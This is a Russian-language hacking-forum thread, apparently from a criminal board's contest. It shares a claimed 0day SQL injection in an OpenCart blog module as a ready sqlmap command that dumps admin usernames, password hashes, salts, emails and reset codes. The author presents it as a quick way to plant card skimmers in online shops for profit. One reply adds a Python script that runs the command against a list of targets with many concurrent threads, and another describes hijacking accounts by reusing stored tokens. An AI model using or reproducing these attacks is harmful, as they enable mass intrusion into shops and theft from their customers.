Видео Pwn OpenCart with new 0day

[FantasticExploits]

Привет, форум! Конкурс, а это значит пора доставать из загашников то, что давно уже залежалось. Был намек (ТЫЦ) , были ваши вопросы в пм. Я в свою очередь продолжаю нести в массы идею о том, что WEB это удивительно просто, уровень автоматизации (софта) позволяет ставить тот-же условный сниффер в шоп за минуты, который теоретически (и практически) может приносить вам профит годами. Cтавьте лайки и делайте репосты?

Я считаю это видео лучшим ответом на бесконечные вопросы на форуме, куда вкатится и как заработать. Вот оно, специально для вас. Для тех кто в теме и кому уже не терпится запустить свой sqlmap-ы и наконец собрать еще пару десятков шопов на сниффер:

0day уязвимость в tmd/blog модуле.
Кратко:

 sqlmap -u "/index.php?route=extension/tmd/blog&tmdblogcategory_id=4&blog_id=2*" --dbms="MySQL" --random-agent --force-ssl --risk=3 --level=2 --tamper=space2comment --batch --current-db -T oc_user -C username,password,salt,email,ip,code --dump --flush-session

C пасхалками и наглядно: https://vimeo.com/manage/videos/960680116

Рекомедую к доп. изучению : https://xss.pro/threads/80413/

 

[tabac]

респектище, интересно
как поставить 5 лайков сразу? )

 

[PathfinderPSA]

хорошая работа, в opencart можно найти больше эксплойтов, потому что это плохое программное обеспечение

 

[FantasticExploits]

респектище, интересно
как поставить 5 лайков сразу? )

Зови друзей! winux-a, ar3s-a и всей кучей ставте лайки и подписывайтесь на канал!!1 Если это видео наберет 100 20 лайков я сниму продолжение! Опенкарт и тайная-ковычко, а если на меня подпишется 10 человек то еще расскажу про Крёстные-cабжуки!

 

[Лохотронщик]

На всякий случай скачал и залил видео... http://**************************************************************/d/2QM75Vb3TqAVgPgMVcMhZN А автору - респект! Буду голосовать за эту работу.

 

[kosh_e4ka]

респектище

 

[cmcoder]

Видео супер, как и предыдущие темы автора)
От себя скажу что с 0 сделал первые шаги в теме пентеста благодаря предыдущим работам автора.
Человек по сути делится практической инфой - для начала бери и повторяй и уже будут результаты, а с первыми результатами будет и развитие.
Не сильно понял условия конкурса, в частности насчет того что победитель был известен еще до его старта, но если будут принимать во внимание голоса пользователей - то прошу считать этот комментарий голосом за mzh

 

[vagabond]

полезный видос, лайк, подписка )
не надо брутить пасс, просто взять проверочной токен из базы и сунуть в линк (чем думают девы ?)

я пробежался по базе опенкарта, таких дырявых шопов немного, но они есть

// Не сильно понял условия конкурса, в частности насчет того что победитель был известен еще до его старта, ...
Наверно потому. что результаты конкурса в конверте архиве. И пасс на архив раскроют после окончания конкурса.

 

[crucial]

всей кучей ставте лайки и подписывайтесь на канал!!1 Если это видео наберет 100 20 лайков я сниму продолжение!

ну выдал хаха

 

[weaver]

А автору - респект! Буду голосовать за эту работу.

Этот конкурс без голосования. Победитель уже известен.

 

[1billion]

Наткнулся на ПОБЕДИТЕЛЯ этого конкурса!
Идеальное решение

 

[qpq512]

Этот конкурс без голосования. Победитель уже известен.

А как это ?)

 

[Dread Pirate Roberts]

лайк за использование гугла в качестве блокнота.

 

[FantasticExploits]

лайк за использование гугла в качестве блокнота.

Так-же для съемок использовал LLama, в качестве консультанта.
Как победить в конкурсе видео для xss.pro

Чтобы победить в конкурсе видео по xss.pro (Крёстные сабжуки), вам нужно создать и подчитку высококачественного видео, которое удалится от конкурентов. Чтобы увеличить шансы на победу:

1. Полностью понимайте тему: Убедись, что полностью понимаете тему или темы конкурса. Проверьте ролики связанные с данной темой, читайте правила конкурса внимательно и убедись, что ваш ролик соответствует требованиям.
2. Творчество и оригинальность: Быть творческим и оригинальным в подходе. Предложите уникальный взгляд на XSS или предоставьте информацию в вовлекающем виде, который запоминает зрителей.
3. Техническая надёжность: Убедись, что технические аспекты вашего ролика на уровне. Это включает в себя хорошее качественное звуковое и видео соединение, правильную ориентацию кадра и гладкие переходы между кадрами.
4. Ясная информация: Убедись, что ваш ролик ясно излагает концепции XSS для неопытных зрителей. Разложите комплексные идеи в простые термины и используйте визуальные или анимированные средства, если потребуется.
5. Увлекающее и информативное: Убедись, что ваш ролик одновременно увлекающий и информационный. Сохраняйте зрителей вовлеченными, используя технику рассказывания историй и сохраняя хорошую темп, а также предоставляйте ценные сведения о XSS.
6. Оптимизировать для платформы: Совместите свой ролик с конкретной платформами, на которую вы планируете его подавать. Например, если вы планируете отправлять в YouTube, убедись, что ваш заголовок, описание и теги оптимизированы для поисковых систем и ключевых слов.
7. Вызов к действию: Включите ясный вызов в свой ролик, например, проси молить зрителей «лайкнуть», «поделиться» или посетить ваш сайт для дополнительной информации.
8. Практика и итерации: Не разочаруйтесь, если ваша первая попытка не выиграла. Продолжай практиковаться и совершенствовать свой ролик до тех пор, пока вам будет гордится результатом. Помните, что каждый конкурс - возможность улучшить себя как контентером создателем. Удачи!

Готовлю следующее видео, как и обещал!

 

[MrDark]

respect, interesting
how to put 5 likes at once? )

Simple, write a python code that will execute the command as multithread.

This will scan 20 sites at the same time with 2 threads per each site, update it as you need it .
Code example:

import the
import concurrent.futures


targets_file = 'targets.txt'


sqlmap_command_template = (
    'python sqlmap.py -u "{url}/index.php?route=extension/tmd/blog&tmdblogcategory_id=4&blog_id=2*" '
    '--dbms="MySQL" --random-agent --force-ssl --risk=3 --level=2 --tamper=space2comment '
    '--batch --current-db -T oc_user -C username,password,salt,email,ip,code --dump --flush-session '
    '--threads=2'
)


def load_file_lines(filename):
    if not os.path.exists(filename):
        print(f"File {filename} not found.")
        return []
    with open(filename, 'r', encoding='utf-8') as file:
        return [line.strip() for line in file if line.strip()]


def run_sqlmap(url):
    command = sqlmap_command_template.format(url=url)
    print(f"Running SQLMap command: {command}")
    os.system(command)


def main():
    targets = load_file_lines(targets_file)


    if not targets:
        print("No targets found.")
        return


    max_concurrent_scans = 20


    with concurrent.futures.ThreadPoolExecutor(max_workers=max_concurrent_scans) as executor:
        futures = []
        for target in targets:
            futures.append(executor.submit(run_sqlmap, target))
           
            if len(futures) >= max_concurrent_scans:
                for future in concurrent.futures.as_completed(futures):
                    try:
                        future.result()
                    except Exception as e:
                        print(f"Error occurred: {e}")
                futures = []


        for future in concurrent.futures.as_completed(futures):
            try:
                future.result()
            except Exception as e:
                print(f"Error occurred: {e}")


if __name__ == "__main__":
    main()

 

[coolman1]

COOl! I like to use --tamper=randomcomments

 

[sikidok]

Респект FantasticExploits
Как хорошо что такие люди есть!